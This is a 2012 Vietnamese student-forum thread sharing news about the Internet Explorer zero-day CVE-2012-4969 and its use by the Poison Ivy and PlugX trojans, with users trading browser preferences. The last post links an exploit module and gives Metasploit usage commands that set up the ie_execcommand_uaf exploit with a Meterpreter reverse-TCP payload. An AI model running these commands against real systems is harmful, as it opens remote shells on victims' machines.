User Tag List

+ Trả lời chủ đề
Hiện kết quả từ 1 tới 6 của 6

Chủ đề: Phát hiện lỗ hổng bảo mật trên Internet Explorer

  1. #1
    HUT's Master Avatar của bkfd
    Tham gia ngày
    Nov 2011
    Bài gửi
    1.191

    Mặc định Phát hiện lỗ hổng bảo mật trên Internet Explorer

    Các nhà nghiên cứu bảo mật vừa cho biết, một lỗ hổng trước đây chưa từng được biết đến trong Internet Explorer (IE) đã được hacker sử dụng để thực hiện các cuộc tấn công.
    Ảnh chụp màn hình này cho thấy một cuộc tấn công thành công chống lại Windows 7 chạy IE 9.

    Theo đó, cả IE 7, 8, 9 đều dính lỗ hổng này. Các nhà nghiên cứu cảnh báo rằng hacker có thể thâm nhập để chèn 1 trojan backdoor (cửa hậu) với tên gọi "Poison Ivy" thông qua lỗ hổng trên. Eric Romang là người đầu tiên phát hiện ra nó vào cuối tuần này và đã đăng thông tin trên blog của mình và khẳng định rằng việc tấn công thông qua lỗ hổng zero-day vẫn chưa thực sự kết thúc.
    Theo Romang, cuộc tấn công được thực hiện thông qua Adobe Flash Player nhằm loại bỏ chức năng bảo vệ ASLR (Address Space Layout Randomization) có trong Windows. Việc khai thác lỗ hổng này chủ yếu được thực hiện từ IE trong Windows XP.
    Các chuyên gia bảo mật cũng đã phát triển một công cụ kiểm tra lỗ hổng với tên gọi Metasploit cho IE 7, 8, 9 trên Windows XP, Vista và Windows 7, người dùng có thể tải về tại đây.
    Microsoft cũng đã lên tiếng về vấn đề này. Trong một email trả lời, Yunsun Wee, Giám đốc bộ phận Microsoft Trustworthy Computing cho biết: "Chúng tôi đã nhận thức được các cuộc tấn công thông qua lỗ hổng trên IE. Chúng tôi đề nghị khách hàng sử dụng phần mềm Enhanced Mitigation Experience Toolkit (EMET) 3.0 để duyệt web an toàn hơn. Microsoft khẳng định IE 10 sẽ không bị ảnh hưởng. Chúng tôi sẽ tiếp tục điều tra và có những hành động cụ thể để khắc phục nó".
    Tuy nhiên Wee đã không thông báo cụ thể thời gian Microsoft công bố bản vá lỗ hổng này.
    Theo CNET

  2. Tớ cảm ơn bkfd đã chia sẻ.


  3. #2
    [ -~] Avatar của bino1810
    Tham gia ngày
    Mar 2012
    Bài gửi
    424

    Mặc định Re: Phát hiện lỗ hổng bảo mật trên Internet Explorer

    FireFox number 1
    SVBK.VN Kết nối bạn bè - Bách Khoa tụ hội

  4. Tớ cảm ơn bino1810 đã chia sẻ.


  5. #3
    .:: Grumpy svBKer ::. Avatar của 1973
    Tham gia ngày
    Mar 2010
    Bài gửi
    3.793

    Mặc định Re: Phát hiện lỗ hổng bảo mật trên Internet Explorer

    @thanhpk92 vào mà đọc này
    Contact me:
    Email: sangnd [at] svBK.vn
    Personal website: My Blog | Chat với người lạ
    Facebook Page của Bách Khoa Forum: http://www.facebook.com/svbk.vn

  6. #4
    HUT's Engineer
    Tham gia ngày
    Jun 2011
    Bài gửi
    686

    Mặc định Re: Phát hiện lỗ hổng bảo mật trên Internet Explorer

    ie cả chrome như kẹc

    dạo này mình chuyển sang dùng opera cả firefox rồi

  7. #5
    HUT's Student
    Tham gia ngày
    Feb 2012
    Bài gửi
    272

    Mặc định Re: Phát hiện lỗ hổng bảo mật trên Internet Explorer

    luakit number 1: nhanh, cực nhẹ, lại có hệ thống phím tắt kiểu vim.

    http://mason-larobina.github.com/luakit/

  8. #6
    .:: Grumpy svBKer ::. Avatar của 1973
    Tham gia ngày
    Mar 2010
    Bài gửi
    3.793

    Mặc định Re: Phát hiện lỗ hổng bảo mật trên Internet Explorer

    Đã có mã khai thác thành công lỗi 0-day Internet Explorer, nguy cơ bị cài đặt malware từ xa (CVE 2012-4969 )

    Microsoft có thông cáo xác nhận chính thức về lỗi 0-day (CVE 2012-4969) trong Internet Explorer. Hiện đã có 4 mã khai thác thành công lỗi này đang được truyền tay trên internet. Microsoft sẽ cung cấp khẩn cấp một bản vá tạm thời để sửa lỗi nghiêm trọng này.

    Chuyên gia bảo mật Eric Romang đã xác định được mã khai thác lỗi Internet Explorer CVE 2012-4969 này được đặt tại một server của nhóm hacker “Nitro” – nhóm vốn được cho rằng là tác giả của mã khai thác nhằm vào lỗi 0-day của Java vào tháng trước. Công ty bảo mật Rapid7 khuyến cáo người dùng nên chuyển qua sử dụng trình duyệt khác thay thế IE.

    Lỗi 0-day trong IE lần này là lỗi “use-after-free memory corruption” một dạng lỗi tương tự với dạng lỗi “buffer overflow”, lỗi này khiến cho máy tính cài đặt phiên bản IE bị lỗi dễ dàng bị hacker cài đặt các malware, virus, trojan từ xa. Mã khai thác đầu tiên được tìm thấy trong trojan PoisonIvy, một mã khai thác khác được tìm thấy trong trojan PlugX, cả 2 trojan này đều được ngụy trang dưới dạng một tập tin Flash Movie ( .swf ) bị thỏa hiệp.

    Kiểu tấn công này thường bắt đầu bằng việc nạn nhân nhận được một email giả mạo hoặc một lời mời click vào một đường link không an toàn. Các chuyên gia an ninh mạng khuyến cáo rằng các trang web lớn hiện có đặt các quảng cáo trên website của họ có thể trở thành mồi ngon cho hacker, nếu như các máy chủ đặt các quảng cáo (vốn độc lập với máy chủ chứa website) bị hack. Qua đó hacker có thể dùng các website lớn để thực hiện việc tấn công diện rộng đối với những người dùng truy cập các website lớn đó

    Trong một diễn biến khác, chính phủ Đức đã khuyến cáo các công dân Đức rằng họ nên thay Internet Explorer bằng một trình duyệt khác như Firefox, Chrome, Opera… . Microsoft thì khuyến cáo người dùng nên tắt chức năng ActiveX controls trên IE hoặc sử dụng Enhanced Mitigation Experience Toolkit cho đến khi họ cung cấp bản vá cho lỗi này

    Công cụ khai thác lỗi huyền thoại Metasploit cũng đã cập nhật mã khai thác này với một thông báo: “Module khai thác mới này chứa mã khai thác nhắm vào lỗi 0-day mới của Microsoft Internet Explorer. Khi IE render một trang HTML, đối tượng CMshtmlEd đã bị xóa bỏ trong quá trình render, nhưng vùng nhớ của đối tượng này lại bị sử dụng lại một lần nữa bởi hàm CMshtmlEd::Exec(), điều này dẫn tới lỗi use-after-free ( gọi vùng nhớ sau khi vùng nhớ đã được làm trống ). Vui lòng ghi nhận rằng lỗi này đã được khai thác từ ngày 14 tháng 09 năm 2012 và cho đến hiện giờ vẫn chưa có bản vá cho lỗi này” .

    Tải về module khai thác này tại đây http://pastebin.com/nyYxKfUJ

    Cách sử dụng:
    Mã:
    use exploit/windows/browser/ie_execcommand_uaf
    set SRVHOST 192.168.178.33
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.178.33
    exploit
    
    sysinfo
    getuid
    (theo TheHackerNews)

    xnohat - HVA News

+ Trả lời chủ đề

Thông tin chủ đề

Users Browsing this Thread

Hiện có 1 người đọc bài này. (0 thành viên và 1 khách)

Quyền viết bài

  • Bạn không thể gửi chủ đề mới
  • Bạn không thể gửi trả lời
  • Bạn không thể gửi file đính kèm
  • Bạn không thể sửa bài viết của mình


About svBK.VN

    Bách Khoa Forum - Diễn đàn thảo luận chung của sinh viên ĐH Bách Khoa Hà Nội. Nơi giao lưu giữa sinh viên - cựu sinh viên - giảng viên của trường.

Follow us on

Twitter Facebook youtube